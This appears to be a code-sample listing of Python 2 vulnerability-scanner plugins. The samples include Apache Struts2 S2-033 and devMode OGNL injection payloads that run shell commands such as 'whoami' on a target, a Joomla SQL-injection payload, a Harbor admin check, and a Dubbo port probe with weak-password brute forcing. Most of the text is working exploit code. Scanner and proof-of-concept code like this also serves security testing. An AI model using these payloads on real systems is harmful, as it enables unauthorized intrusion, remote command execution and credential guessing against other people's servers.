Example #1
0
 def strust2_033(self,url): 
     from urlparse import urljoin
     result = {}
     # S2-033 POC
     # Author: CF_HB
     # 时间:2016年6月6日
     # 漏洞编号:CVE-2016-3087 (S2-033)
     # 漏洞详情:http://blog.nsfocus.net/apache-struts2-vulnerability-technical-analysis-protection-scheme-s2-033/
     s2033_poc = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=echo vulnerable"
     try:
         poc_url = urljoin(url,s2033_poc)
         #print poc_url
         s = req.session()
         res = s.post(poc_url, timeout=4, allow_redirects=False, verify=False)
         print '033poc###################################'
         print res.content
         if res.status_code == 200 and "vulnerable" in res.content:
             #print "{url} is vulnerable S2-033.".format(url=url)
                 exp = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami"
                 target = urljoin(url, exp) 
                 res = req.post(target, timeout=3, allow_redirects=False, verify=False)
                 restext = res.text.encode('utf-8').strip().strip('\x00')
                 print '033exp###########################'
                 print restext
                 if 'command=whoami' not in restext:
                     result['VerifyInfo'] = {}
                     result['name'] = 'strust2_033'
                     result['VerifyInfo']['URL'] = url
                     result['VerifyInfo']['Payload'] = poc_url
         else:
             #print "{url} is not vulnerable..".format(url=url)
             pass
     except Exception, e:
         print e
 def __init__(self, url, *args, **kwargs):
     super(SockJS, self).__init__(*args, **kwargs)
     self.base = '{}/{}/{}'.format(url, random.randint(0, 1000),
                                   random_str(8))
     self.daemon = True
     self.session = req.session()
     self.session.headers = {
         'Referer':
         url,
         'User-Agent':
         'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
     }
     self.t = int(time.time() * 1000)
Example #3
0
 def _verify(self):
     result = {}
     harbor_session = req.session()
     username = self.get_pass(harbor_session)
     url = urljoin(self.url, '/api/users')
     header = {
         "Content-Type": "application/json",
         "Accept": "application/json"
     }
     content = harbor_session.get(url, headers=header).content
     for item in json.loads(content):
         if item['username'] == username and item['has_admin_role']:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = url
             return self.parse_output(result)
     return self.parse_output(result)
Example #4
0
 def _verify(self):
     '''verify mode'''
     result = {}
     joomla_session = req.session()
     self.get_pass(joomla_session)
     rand_str = randomStr(10, "0123456789")
     url = urljoin(self.url,
                   '/administrator/index.php?option=com_users&view=notes')
     sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format(
         randstr=rand_str)
     r = joomla_session.post(url=url,
                             headers=self.headers,
                             data=sqli_payload)
     if r.status_code == 500 and hashlib.md5(
             rand_str).hexdigest()[0:31] in r.content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = url
     return self.parse_output(result)
Example #5
0
 def strust2_devmode(self,url):
     from urlparse import urljoin
     result = {}
     #devMode模式漏洞
     data_dev = '?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=echo vulnerable'
     try:
         poc_url = urljoin(url,data_dev)
         #print poc_url
         s = req.session()
         res = s.post(poc_url, timeout=4, allow_redirects=False, verify=False)
         if "vulnerable" in res.content:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = url
             result['VerifyInfo']['Payload'] = poc_url + "strust2_devmode"    
         else:
             #print "{url} is not vulnerable..".format(url=url)
             pass
     except Exception, e:
         #print "Failed to connection target, try again.."
         print e
Example #6
0
    def _verify(self):
        # 调用指纹方法
        result = {}
        output = Output(self)

        import socket
        import telnetlib
        import base64

        # 默认端口 web 8080 telnet 7070 但是很多dubbo自定义了端口,以下是其他比较常见的dubbo可能存在的端口
        unauth_ports = {  #用于探测 1、直接未授权访问  2、basic 弱口令登录
            "80",
            "443",
            "8080",  #default port   test demo 1.1.1.1
            # "8081",
            # "8082",
            # "8083",
            # "8084",
            # "8086",
            "8088",
            "8888",
            # "8089",
            # "8090",
            "8000",  # default pwd test  :http://1.1.1.1:8000/
            # "9080",
            # "9090",
            # "9999",
            # "18080",
            # "28080",
        }
        default_account = {   #默认账号检测  default  root/root(admin)   guest /guest
            "root",
            #"admin",
            "guest",
        }
        default_pwd = {  #默认密码检测
            "root",
            #"admin",
            "guest",
        }
        telnet_ports = {
            "7070",  #default port  1.1.1.1
            # "1234",
            # "8000",
            "10001",
            # "9999",
            # "19999",
            # "29999",
            # "20000",
            # "18080",
            # "28080",
            # "6060",
            # "8084",
            # "12345",
        }
        vul_port = []
        #step 1 http 以及弱口令
        for p in unauth_ports:
            url = '%s:%s' % (self.url, p)
            try:
                resp = req.get(str(url), timeout=1)
                #print resp.text
                if "<title>dubbo</title>" in resp.text.lower():
                    vul_port.append(p)
                elif resp.headers[
                        "www-authenticate"] == "Basic realm=\"dubbo\"":
                    #print "get basic"
                    #vul_port.append(p)
                    #构造弱口令爆破
                    for user in default_account:
                        for pwd in default_pwd:
                            verify_str = user + ":" + pwd
                            #print verify_str
                            verify_str = base64.b64encode(verify_str)
                            basic_auth = {
                                'Authorization': 'BASIC ' + verify_str
                            }
                            #print verify_str
                            httpreq = req.session()
                            raa = httpreq.get(url,
                                              headers=basic_auth,
                                              timeout=1)
                            #print raa.text
                            #print raa.status_code
                            if 200 == raa.status_code:
                                #print "get weak pwd"
                                py = p + ':(' + user + '|' + pwd + ')'
                                vul_port.append(py)
            except Exception, e:
                #print e
                pass